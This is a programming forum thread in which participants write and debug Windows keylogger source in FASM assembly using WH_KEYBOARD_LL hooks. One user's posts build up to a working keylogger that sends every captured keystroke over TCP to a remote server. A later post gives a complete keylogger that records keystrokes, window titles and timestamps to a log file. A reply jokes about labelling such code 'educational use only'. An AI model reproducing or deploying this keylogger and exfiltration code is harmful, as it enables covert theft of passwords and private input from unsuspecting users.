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> Windows > LowLevel keyboard hook problem |
Author |
LocoDelAssembly 04 Sep 2008, 01:15
According to documentation the thread that creates the hook must have a message processing loop.
Also the way you are calling CallNextHookEx is wrong, you are calling "CallNextHookEx(hook, ???, nCode, lParam)". |
04 Sep 2008, 01:15 |
asmcoder 04 Sep 2008, 11:40
[content deleted]
Last edited by asmcoder on 14 Aug 2009, 14:56; edited 1 time in total |
04 Sep 2008, 11:40 |
bcdsys 05 Sep 2008, 22:45
MessageLoop thing correct, made new code and worked. I will later make driver with IDT hook, but first user mode keylogger. This is still counter, will make real keylogger based on this soon.
Code: ;keylogger for Win32 systems, written in fasm ;uses WH_KEYBOARD_LL hook format PE GUI 4.0 include 'win32a.inc' section '' code readable executable entry $ push OneCopy push 0 push 0 call [CreateMutex] call [GetLastError] cmp eax, 183 jne @f push 0x00040000 push 0 push msg_duplicate_process push 0 call [MessageBox] ret @@: push 0x77 push 0x3 push 0x0BADFACE push 0 call [RegisterHotKey] ;exit on ctrl-alt-f8 test eax, eax jnz @f push 0x00040000 push 0 push msg_hotkey_failed push 0 call [MessageBox] ret @@: push 0 call [GetModuleHandle] push 0 push eax push kbdhook push 13 ;low level key logger WH_KEYBOARD_LL call [SetWindowsHookEx] test eax, eax jnz @f push 0x00040000 push 0 push msg_SetWindowsHookEx_error push 0 call [MessageBox] ret @@: mov [hook], eax sub esp, 28 mov eax, esp push 0 push 0 push 0 push eax call [GetMessage] ;wait for message like hotkey add esp, 28 push [hook] call [UnhookWindowsHookEx] ;remove hook sub esp, 16 mov ebx, esp push [count] push putint push ebx call [wsprintf] ;number of key events in string add esp, 12 push 0x00040000 push 0 push ebx push 0 call [MessageBox] ;disp number add esp, 16 ret ;exit ;LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) kbdhook: inc [count] mov eax, [esp+12] push eax mov eax, [esp+8] push eax mov eax, [esp+4] push eax push [hook] call [CallNextHookEx] ret 12 section '' data readable writeable hook dd 0 count dd 0 putint db '%d', 13, 10, 0 msg_duplicate_process db 'Program already running', 13, 10, 0 msg_hotkey_failed db 'RegisterHotKey failed', 13, 10, 0 OneCopy db 'Global\KeylogMutex', 0 msg_SetWindowsHookEx_error db 'SetWindowsHookEx failed', 13, 10, 0 section '' import readable library kernel32, 'KERNEL32.DLL', user32, 'USER32.DLL', msvcrt, 'MSVCRT.DLL' import kernel32, CreateMutex, 'CreateMutexA', GetLastError, 'GetLastError', GetModuleHandle, 'GetModuleHandleA', Sleep, 'Sleep', Beep, 'Beep' import user32, SetWindowsHookEx, 'SetWindowsHookExA', CallNextHookEx, 'CallNextHookEx', UnhookWindowsHookEx, 'UnhookWindowsHookEx', RegisterHotKey, 'RegisterHotKey', MessageBox, 'MessageBoxA',\ GetMessage, 'GetMessageA', wsprintf, 'wsprintfA' section '' fixups discardable If any problems pelase post. |
05 Sep 2008, 22:45 |
Alphonso 06 Sep 2008, 08:04
I'm curious why you program like
Code: kbdhook: inc [count] mov eax, [esp+12] push eax mov eax, [esp+8] push eax mov eax, [esp+4] push eax push [hook] call [CallNextHookEx] ret 12 Code: proc kbdhook ncode,wparam,lparam inc [count] invoke CallNextHookEx,[hook],[ncode],[wparam],[lparam] ret endp If your going to push [esp+12] like that then you need to take into account esp changes ie Code: mov eax,[esp+12] push eax ;esp->esp-4, [esp+8] is now at [esp+12] mov eax,[esp+12] ; ... Code: push dword [esp+12] push dword [esp+12] push dword [esp+12] push [hook] call [CallNextHookEx] |
06 Sep 2008, 08:04 |
bcdsys 20 Sep 2008, 02:50
Can I use winsock in WH_KEYBOARD_LL? Following code not working:
Code: ;keylogger for Win32 systems, written in fasm ;uses WH_KEYBOARD_LL hook ;sends data to specified server on port 3216 format PE GUI 4.0 include 'win32a.inc' section '' code readable executable entry $ pop [exit] push OneCopy push 0 push 0 call [CreateMutex] call [GetLastError] cmp eax, 183 jne @f push 0x00040000 push 0 push msg_duplicate_process push 0 call [MessageBox] ret @@: sub esp, 512 mov eax, esp push eax push 0x202 call [WSAStartup] add esp, 512 test eax, eax jz @f push 0x00040000 push 0 push msg_WSAStartup_failed push 0 call [MessageBox] jmp [exit] @@: push 6 push 1 push 2 call [socket] ;create socket cmp eax, not 0 jnz @f push 0x00040000 push 0 push msg_socket_failed push 0 call [MessageBox] jmp [exit] @@: mov ebx, eax push server_ip call [inet_addr] cmp eax, 0xffffffff jnz @f push 0x00040000 push 0 push msg_inet_addr_failed push 0 call [MessageBox] jmp [exit] @@: sub esp, 16 mov word [esp], 2 mov dx, 3216 xchg dh, dl mov word [esp+2], dx mov [esp+4], eax mov edx, esp push 16 push edx push ebx call [connect] ;connect to server cmp eax, -1 jnz @f push 0x00040000 push 0 push msg_connect_failed push 0 call [MessageBox] jmp [exit] @@: add esp, 16 ;clean up stack mov [sock], ebx push 0x77 push 0x3 push 0x0BADFACE push 0 call [RegisterHotKey] ;exit on ctrl-alt-f8 test eax, eax jnz @f push 0x00040000 push 0 push msg_hotkey_failed push 0 call [MessageBox] jmp [exit] @@: push msg_keylog_start call [lstrlen] push 0 push eax push msg_keylog_start push ebx call [send] ;send start msg to server push 0 call [GetModuleHandle] push 0 push eax push kbdhook push 13 ;low level key logger WH_KEYBOARD_LL call [SetWindowsHookEx] test eax, eax jnz @f push 0x00040000 push 0 push msg_SetWindowsHookEx_error push 0 call [MessageBox] jmp [exit] @@: mov [hook], eax sub esp, 28 mov eax, esp push 0 push 0 push 0 push eax call [GetMessage] ;wait for message like hotkey add esp, 28 push [hook] call [UnhookWindowsHookEx] ;remove hook push msg_keylog_end call [lstrlen] push 0 push eax push msg_keylog_end push ebx call [send] ;send start msg to server add esp, 8 push ebx call [closesocket] call [WSACleanup] jmp [exit] ;LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) kbdhook: push ebx inc [count] mov eax, [esp+8] and eax, not 4 cmp eax, 0x100 jnz .done mov eax, [esp+12] mov eax, [eax+4] shl eax, 16 and eax, 0xFF0000 ;lparam format for GetKeyNameText sub esp, 16 mov ecx, esp push 16 push ecx push eax call [GetKeyNameText] test eax, eax jnz @f mov dword [esp], 0x525245 @@: mov ebx, esp push ebx call [lstrlen] push 0 push eax push ebx push [sock] call [send] ;sned keystroke cmp eax, 0xffffffff jnz @f push 100 push 1000 call [Beep] @@: .done: push dword [esp+12] push dword [esp+12] push dword [esp+12] push [hook] call [CallNextHookEx] pop ebx ret 12 section '' data readable writeable hook dd 0 count dd 0 keyfile dd 0 exit dd 0 sock dd 0 putint db '%d', 13, 10, 0 msg_duplicate_process db 'Program already running', 13, 10, 0 msg_hotkey_failed db 'RegisterHotKey failed', 13, 10, 0 OneCopy db 'Global\KeylogMutex', 0 msg_SetWindowsHookEx_error db 'SetWindowsHookEx failed', 13, 10, 0 putkey db '[%s] ', 0 msg_fopen_failed db 'Error: file open failed', 13, 10, 0 msg_keylog_start db 'Keylog session start', 13, 10, 0 msg_keylog_end db 13, 10, 'Keylog session end', 13, 10, 0 msg_WSAStartup_failed db 'WSAStartup failed', 13, 10, 0 msg_socket_failed db 'socket failed', 13, 10, 0 msg_inet_addr_failed db 'inet_addr failed', 13, 10, 0 msg_connect_failed db 'connect failed', 13, 10, 0 server_ip db '', 0 section '' import readable library kernel32, 'KERNEL32.DLL', user32, 'USER32.DLL', ws2_32, 'ws2_32.DLL' import kernel32, CreateMutex, 'CreateMutexA', GetLastError, 'GetLastError', GetModuleHandle, 'GetModuleHandleA', Sleep, 'Sleep', Beep, 'Beep', lstrlen, 'lstrlen' import user32, SetWindowsHookEx, 'SetWindowsHookExA', CallNextHookEx, 'CallNextHookEx', UnhookWindowsHookEx, 'UnhookWindowsHookEx', RegisterHotKey, 'RegisterHotKey', MessageBox, 'MessageBoxA',\ GetMessage, 'GetMessageA', wsprintf, 'wsprintfA', GetKeyboardState, 'GetKeyboardState', ToAscii, 'ToAscii', GetKeyNameText, 'GetKeyNameTextA' import ws2_32, WSAStartup, 'WSAStartup', socket, 'socket', connect, 'connect', inet_addr, 'inet_addr', send, 'send', closesocket, 'closesocket', WSACleanup, 'WSACleanup' section '' fixups discardable Code tries to send keystrokes to server. msg indicate start/end send, but keystrokes not So far using quetannon server (i have own but very basic, so using quetannon for now). Should i instead put keystrokes in buffer, and use WM_TIMER with sockets in that handler to send buffer to server? |
20 Sep 2008, 02:50 |
bcdsys 22 Sep 2008, 02:34
Now I have keylogger working! Program works, logs keystrokes, use quetannon server for test, sent over TCP port 3216, records both shift key presses and RELEASES (fixes bug old version, not known when ctrl/alt/shift released after pressed). Code is:
Code: ;keylogger for Win32 systems, written in fasm ;uses WH_KEYBOARD_LL hook ;sends data to specified server on port 3216 format PE GUI 4.0 include 'win32a.inc' section '' code readable executable entry $ mov eax, [esp] mov [exit], eax push OneCopy push 0 push 0 call [CreateMutex] call [GetLastError] cmp eax, 183 jne @f push 0x00040000 push 0 push msg_duplicate_process push 0 call [MessageBox] ret @@: sub esp, 512 mov eax, esp push eax push 0x202 call [WSAStartup] add esp, 512 test eax, eax jz @f push 0x00040000 push 0 push msg_WSAStartup_failed push 0 call [MessageBox] ret @@: push 6 push 1 push 2 call [socket] ;create socket cmp eax, not 0 jnz @f push 0x00040000 push 0 push msg_socket_failed push 0 call [MessageBox] ret @@: mov ebx, eax push server_ip call [inet_addr] cmp eax, 0xffffffff jnz @f push 0x00040000 push 0 push msg_inet_addr_failed push 0 call [MessageBox] jmp [exit] @@: sub esp, 16 mov word [esp], 2 mov dx, 3216 xchg dh, dl mov word [esp+2], dx mov [esp+4], eax mov edx, esp push 16 push edx push ebx call [connect] ;connect to server cmp eax, -1 jnz @f push 0x00040000 push 0 push msg_connect_failed push 0 call [MessageBox] jmp [exit] @@: add esp, 16 ;clean up stack mov [sock], ebx push 0x77 push 0x3 push 0x0BAD push 0 call [RegisterHotKey] ;exit on ctrl-alt-f8 test eax, eax jnz @f push 0x00040000 push 0 push msg_hotkey_failed push 0 call [MessageBox] jmp [exit] @@: push msg_keylog_start call [lstrlen] push 0 push eax push msg_keylog_start push ebx call [send] ;send start msg to server push 0 call [GetModuleHandle] push 0 push eax push kbdhook push 13 ;low level key logger WH_KEYBOARD_LL call [SetWindowsHookEx] mov [hook], eax test eax, eax jnz @f push 0x00040000 push 0 push msg_SetWindowsHookEx_error push 0 call [MessageBox] jmp [exit] @@: push 0 mov eax, esp push timerproc push 1000 ;1 second push eax push 0 call [SetTimer] ;set timer each second add esp, 4 test eax, eax jnz @f push 0x00040000 push 0 push msg_SetTimer_failed push 0 call [MessageBox] jmp [exit] @@: sub esp, 28 message_loop: mov eax, esp push 0 push 0 push 0 push eax call [GetMessage] ;wait for message like hotkey cmp eax, -1 je terminate_program xor eax, eax lea ax, [esp+4] cmp ax, 0x312 mov eax, esp push eax call [DispatchMessage] jne message_loop terminate_program: add esp, 28 push [hook] call [UnhookWindowsHookEx] ;remove hook push msg_keylog_end call [lstrlen] push 0 push eax push msg_keylog_end push ebx call [send] ;send start msg to server add esp, 8 push ebx call [closesocket] call [WSACleanup] jmp [exit] ;LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) kbdhook: inc [count] mov eax, [esp+12] mov eax, [eax] cmp eax, 0xA0 jb @f cmp eax, 0xA5 ja @f jmp .check @@: mov eax, [esp+8] and eax, not 4 cmp eax, 0x100 jnz .done .check: cmp [bufpos], 16*64 jae .done mov eax, [esp+12] mov eax, [eax+4] shl eax, 16 and eax, 0xFF0000 ;lparam format for GetKeyNameText sub esp, 16 mov ecx, esp push 16 push ecx push eax call [GetKeyNameText] test eax, eax jnz @f mov dword [esp], 0x525245 @@: mov eax, esp mov ecx, [bufpos] add ecx, keybuf push eax mov eax, [esp+28] and eax, not 4 cmp eax, 0x100 jz @f push putkey_end jmp .done_putkey @@: push putkey .done_putkey: push ecx call [wsprintf] add esp, 28 ;clean up stack add [bufpos], 16 .done: push dword [esp+12] push dword [esp+12] push dword [esp+12] push [hook] call [CallNextHookEx] ret 12 ;timer proc, sends data to socket timerproc: push ebx esi edi cmp [time_lock], 0 jnz .endproc mov [time_lock], 1 cld .queue_get_next: cmp [bufpos], 0 jz .done sub esp, 16 mov esi, keybuf mov edi, esp mov ecx, 4 rep movsd ;copy data mov edi, keybuf lea esi, [edi+16] mov ecx, 16*63 rep movsb sub [bufpos], 16 mov ebx, esp push ebx call [lstrlen] ;get string length push 0 push eax push ebx push [sock] call [send] ;send data to server add esp, 16 ;clean up stack jmp .queue_get_next .done: mov [time_lock], 0 .endproc: pop edi esi ebx ret 16 section '' data readable writeable hook dd 0 count dd 0 exit dd 0 sock dd 0 bufpos dd 0 keybuf rb 16*64 ;keypress queue putint db '%d', 13, 10, 0 msg_duplicate_process db 'Program already running', 13, 10, 0 msg_hotkey_failed db 'RegisterHotKey failed', 13, 10, 0 OneCopy db 'Global\KeylogMutex', 0 msg_SetWindowsHookEx_error db 'SetWindowsHookEx failed', 13, 10, 0 putkey db '[%s] ', 13, 10, 0 putkey_end db '[/%s] ', 13, 10, 0 msg_fopen_failed db 'Error: file open failed', 13, 10, 0 msg_keylog_start db 'Keylog session start', 13, 10, 0 msg_keylog_end db 13, 10, 'Keylog session end', 13, 10, 0 msg_WSAStartup_failed db 'WSAStartup failed', 13, 10, 0 msg_socket_failed db 'socket failed', 13, 10, 0 msg_inet_addr_failed db 'inet_addr failed', 13, 10, 0 msg_connect_failed db 'connect failed', 13, 10, 0 msg_send_failed db 'send failed', 13, 10, 0 msg_SetTimer_failed db 'SetTimer failed', 13, 10, 0 server_ip db '', 0 time_lock db 0 endcode db 0 section '' import readable library kernel32, 'KERNEL32.DLL', user32, 'USER32.DLL', ws2_32, 'ws2_32.DLL' import kernel32, CreateMutex, 'CreateMutexA', GetLastError, 'GetLastError', GetModuleHandle, 'GetModuleHandleA', Sleep, 'Sleep', Beep, 'Beep', lstrlen, 'lstrlen' import user32, SetWindowsHookEx, 'SetWindowsHookExA', CallNextHookEx, 'CallNextHookEx', UnhookWindowsHookEx, 'UnhookWindowsHookEx', RegisterHotKey, 'RegisterHotKey', MessageBox, 'MessageBoxA',\ GetMessage, 'GetMessageA', wsprintf, 'wsprintfA', GetKeyboardState, 'GetKeyboardState', ToAscii, 'ToAscii', GetKeyNameText, 'GetKeyNameTextA', SetTimer, 'SetTimer', DispatchMessage, 'DispatchMessageA' import ws2_32, WSAStartup, 'WSAStartup', socket, 'socket', connect, 'connect', inet_addr, 'inet_addr', send, 'send', closesocket, 'closesocket', WSACleanup, 'WSACleanup' section '' fixups discardable |
22 Sep 2008, 02:34 |
r22 22 Sep 2008, 15:46
A few notes
- When I started on this forum it was generally frowned upon to post keylogger (or any working malware) source code. - You should be using UDP sockets instead of TCP. - Your source code is an eye-sore, in the future consider using, macros (even if its just INVOKE and STDCALL), commenting the parameters of your functions, using informative label names for branching, and NOT using 'magic numbers'. This will make your code easier to follow and you'd have the added bonus of being able to claim that its for 'educational use only'. |
22 Sep 2008, 15:46 |
mangler 02 Mar 2015, 14:25
Code: format PE GUI 5.0 ; Subsystem Version (min Windows 2000) ; ========================================================= section '.code' code import writeable readable executable ; ========================================================= include 'win32ax.inc' include 'IF.inc' ; ===================== include 'iat.imports' ; ===================== FILE_APPEND_DATA = 0x0004 struct KBDLLHOOKSTRUCT vkCode rd 1 scanCode rd 1 flags rd 1 time rd 1 dwExtraInfo rd 1 ends proc WriteToFile uses esi, wText locals dwBytesWritten rd 1 hFile rd 1 endl invoke CreateFileW, log_file, FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL .if eax <> INVALID_HANDLE_VALUE mov [hFile], eax invoke lstrlenW, [wText] imul eax, 2 invoke WriteFile, [hFile], [wText], eax, addr dwBytesWritten, NULL .if eax = 1 invoke CloseHandle, [hFile] xor eax, eax inc eax ret .endif .endif xor eax, eax ret endp proc KeyEvent uses esi, nCode, wParam, lParam locals window_text du 1024 dup (?) old_window_text du 1024 dup (?) wszAppName du 1024 dup (?) szKey du 256 dup (?) buff du 256 dup (?) UniChar du 16 dup (?) hWindowHandle rd 1 dwMsg rd 1 dwProcessId rd 1 endl .if (([nCode] = HC_ACTION) & (([wParam] = WM_SYSKEYDOWN) | ([wParam] = WM_KEYDOWN))) mov esi, [lParam] virtual at esi kbHook KBDLLHOOKSTRUCT <> end virtual mov eax, [kbHook.flags] shl eax, 0x8 add eax, [kbHook.scanCode] shl eax, 0x10 inc eax invoke GetKeyNameTextW, eax, addr szKey, 256 invoke GetForegroundWindow .if eax <> NULL mov [hWindowHandle], eax invoke GetWindowTextW, [hWindowHandle], addr window_text, 1024 .if eax <> 0 invoke lstrcmpW, addr window_text, addr old_window_text .if eax <> 0 invoke GetLocalTime, LocalTime movzx eax, word[LocalTime.wSecond] push eax movzx eax, word[LocalTime.wMinute] push eax movzx eax, word[LocalTime.wHour] push eax movzx eax, word[LocalTime.wYear] push eax movzx eax, word[LocalTime.wMonth] push eax movzx eax, word[LocalTime.wDay] push eax cinvoke wsprintfW, addr wszAppName, tittleFrmt, addr window_text stdcall WriteToFile, addr wszAppName .if eax = 1 invoke lstrcpyW, addr old_window_text, addr window_text .endif .endif .endif invoke GetKeyState, VK_LCONTROL mov ecx, 32768 test cx, ax je @f .if [kbHook.vkCode] <> VK_LCONTROL cinvoke wsprintfW, addr buff, sfrmtLcontrol, addr szKey stdcall WriteToFile, addr buff jmp next .endif @@: invoke GetKeyState, VK_RCONTROL mov ecx, 32768 test cx, ax je @f .if [kbHook.vkCode] <> VK_RCONTROL cinvoke wsprintfW, addr buff, sfrmtRcontrol, addr szKey stdcall WriteToFile, addr buff jmp next .endif @@: invoke GetKeyState, VK_LMENU mov ecx, 32768 test cx, ax je @f .if [kbHook.vkCode] <> VK_LMENU cinvoke wsprintfW, addr buff, sfrmtLmenu, addr szKey stdcall WriteToFile, addr buff jmp next .endif @@: invoke GetKeyState, VK_RMENU mov ecx, 32768 test cx, ax je @f .if [kbHook.vkCode] <> VK_RMENU cinvoke wsprintfW, addr buff, sfrmtRmenu, addr szKey stdcall WriteToFile, addr buff jmp next .endif @@: invoke GetKeyState, VK_LWIN mov ecx, 32768 test cx, ax je @f .if [kbHook.vkCode] <> VK_LWIN cinvoke wsprintfW, addr buff, sfrmtLwin, addr szKey stdcall WriteToFile, addr buff jmp next .endif @@: invoke GetKeyState, VK_RWIN mov ecx, 32768 test cx, ax je @f .if [kbHook.vkCode] <> VK_RWIN cinvoke wsprintfW, addr buff, sfrmtRwin, addr szKey stdcall WriteToFile, addr buff jmp next .endif @@: .if [kbHook.vkCode] = VK_BACK stdcall WriteToFile, sBackspace .elseif [kbHook.vkCode] = VK_TAB stdcall WriteToFile, sTab .elseif [kbHook.vkCode] = VK_RETURN stdcall WriteToFile, sEnter .elseif [kbHook.vkCode] = VK_PAUSE stdcall WriteToFile, sPause .elseif [kbHook.vkCode] = VK_CAPITAL stdcall WriteToFile, sCapsLock .elseif [kbHook.vkCode] = VK_ESCAPE stdcall WriteToFile, sEsc .elseif [kbHook.vkCode] = VK_PRIOR stdcall WriteToFile, sPageUp .elseif [kbHook.vkCode] = VK_NEXT stdcall WriteToFile, sPageDown .elseif [kbHook.vkCode] = VK_END stdcall WriteToFile, sEnd .elseif [kbHook.vkCode] = VK_HOME stdcall WriteToFile, sHome .elseif [kbHook.vkCode] = VK_LEFT stdcall WriteToFile, sLeft .elseif [kbHook.vkCode] = VK_UP stdcall WriteToFile, sUp .elseif [kbHook.vkCode] = VK_RIGHT stdcall WriteToFile, sRight .elseif [kbHook.vkCode] = VK_DOWN stdcall WriteToFile, sDown .elseif [kbHook.vkCode] = VK_SNAPSHOT stdcall WriteToFile, sPrintScreen .elseif [kbHook.vkCode] = VK_INSERT stdcall WriteToFile, sIns .elseif [kbHook.vkCode] = VK_DELETE stdcall WriteToFile, sDel .elseif [kbHook.vkCode] = VK_F1 stdcall WriteToFile, sF1 .elseif [kbHook.vkCode] = VK_F2 stdcall WriteToFile, sF2 .elseif [kbHook.vkCode] = VK_F3 stdcall WriteToFile, sF3 .elseif [kbHook.vkCode] = VK_F4 stdcall WriteToFile, sF4 .elseif [kbHook.vkCode] = VK_F5 stdcall WriteToFile, sF5 .elseif [kbHook.vkCode] = VK_F6 stdcall WriteToFile, sF6 .elseif [kbHook.vkCode] = VK_F7 stdcall WriteToFile, sF7 .elseif [kbHook.vkCode] = VK_F8 stdcall WriteToFile, sF8 .elseif [kbHook.vkCode] = VK_F9 stdcall WriteToFile, sF9 .elseif [kbHook.vkCode] = VK_F10 stdcall WriteToFile, sF10 .elseif [kbHook.vkCode] = VK_F11 stdcall WriteToFile, sF11 .elseif [kbHook.vkCode] = VK_F12 stdcall WriteToFile, sF12 .elseif [kbHook.vkCode] = VK_NUMLOCK stdcall WriteToFile, sNumLock .elseif [kbHook.vkCode] = VK_SCROLL stdcall WriteToFile, sScrollLock .elseif [kbHook.vkCode] = VK_APPS stdcall WriteToFile, sApplications .else invoke VirtualAlloc, 0, 256, MEM_COMMIT, PAGE_EXECUTE_READWRITE mov edi, eax invoke GetKeyboardState, edi .if eax <> 0 invoke GetKeyState, VK_SHIFT mov [edi + VK_SHIFT], al invoke GetKeyState, VK_CAPITAL mov [edi + VK_CAPITAL], al invoke GetForegroundWindow invoke GetWindowThreadProcessId, eax, addr dwProcessId invoke GetKeyboardLayout, eax invoke ToUnicodeEx, [kbHook.vkCode], [kbHook.scanCode], edi, addr UniChar, 16, [kbHook.flags], eax stdcall WriteToFile, addr UniChar .endif invoke VirtualFree, edi, 0, MEM_RELEASE .endif .endif .endif next: invoke CallNextHookEx, [hKeyHook], [nCode], [wParam], [lParam] ret endp proc KeyLogger uses edi, lpParameter locals msg MSG endl invoke GetModuleHandleA, NULL test eax, eax jne @f invoke LoadLibraryA, [lpParameter] test eax, eax jne @f inc eax jmp exit @@: invoke SetWindowsHookExA, WH_KEYBOARD_LL, KeyEvent, eax, NULL mov [hKeyHook], eax @@: invoke GetMessageA, addr msg, 0, 0, 0 test eax, eax je exit invoke TranslateMessage, addr msg invoke DispatchMessageA, addr msg jmp @b invoke UnhookWindowsHookEx, addr hKeyHook xor eax, eax exit: ret endp ; ========================================================= ; ENTRY POINT ; ========================================================= entry $ invoke CreateThread, NULL, NULL, KeyLogger, NULL, NULL, dwThread test eax, eax je @f invoke WaitForSingleObject, eax, -1 jmp Exit @@: xor eax, eax inc eax Exit: ret tittleFrmt du 10, 10, '[%s] - %02d/%02d/%04d, %02d:%02d:%02d', 10, 0 log_file du 'log_file.txt', 0 sfrmtLcontrol du '[CtrlL + %s]', 0 sfrmtRcontrol du '[CtrlR + %s]', 0 sfrmtLmenu du '[AltL + %s]', 0 sfrmtRmenu du '[AltR + %s]', 0 sfrmtLwin du '[WinL + %s]', 0 sfrmtRwin du '[WinR + %s]', 0 sBackspace du '[Backspace]', 0 sTab du '[Tab]', 0 sEnter du '[Enter]', 10, 0 sPause du '[Pause]', 0 sCapsLock du '[Caps Lock]', 0 sEsc du '[Esc]', 0 sPageUp du '[Page Up]', 0 sPageDown du '[Page Down]', 0 sEnd du '[End]', 0 sHome du '[Home]', 0 sLeft du '[Left]', 0 sUp du '[Up]', 0 sRight du '[Right]', 0 sDown du '[Down]', 0 sPrintScreen du '[Print Screen]', 0 sIns du '[Ins]', 0 sDel du '[Del]', 0 sF1 du '[F1]', 0 sF2 du '[F2]', 0 sF3 du '[F3]', 0 sF4 du '[F4]', 0 sF5 du '[F5]', 0 sF6 du '[F6]', 0 sF7 du '[F7]', 0 sF8 du '[F8]', 0 sF9 du '[F9]', 0 sF10 du '[F10]', 0 sF11 du '[F11]', 0 sF12 du '[F12]', 0 sNumLock du '[Num Lock]', 0 sScrollLock du '[Scroll Lock]', 0 sApplications du '[Applications]', 0 LocalTime SYSTEMTIME <> dwThread rd 1 hKeyHook rd 1 have a nice day |
02 Mar 2015, 14:25 |
Foxxy 03 Mar 2015, 03:20
Since this is a thread about hooks, I was wondering if there was a way to hook without using Windows Hooking APIs. Would it be possible to simply read the import table of a DLL, find the address and do your hooking manually? Or would this be a lot more complicated? Is there some reading somewhere I could do about hooking in assembly?
03 Mar 2015, 03:20 |
revolution 03 Mar 2015, 03:37
Yes, you can modify DLLs "manually" if you like.
Doing it inside of your process only affects your process because of copy-on-write. Doing it outside of a process (i.e. on disk) will affect all processes that use it, but if it is a registered system DLL then you will have some difficulty modifying it on disk and getting it to remain there. Some DLLs are signed and any changes will create problems when trying to load them. |
03 Mar 2015, 03:37 |
Foxxy 03 Mar 2015, 05:23
Manually is fairly easy, I understand the concepts behind that 100%. But what about a specific process's DLL? What does SetWindowsHook do that I couldn't do myself?
03 Mar 2015, 05:23 |
revolution 03 Mar 2015, 05:45
SetWindowsHook uses a chain so that many different procedures can hook the same function. It is a documented and defined method that works on all platforms that support it.
03 Mar 2015, 05:45 |
Foxxy 04 Mar 2015, 04:16
That is very interesting! A chain so that multiple programs can use the same hook, that is very clever and very cool.
04 Mar 2015, 04:16 |
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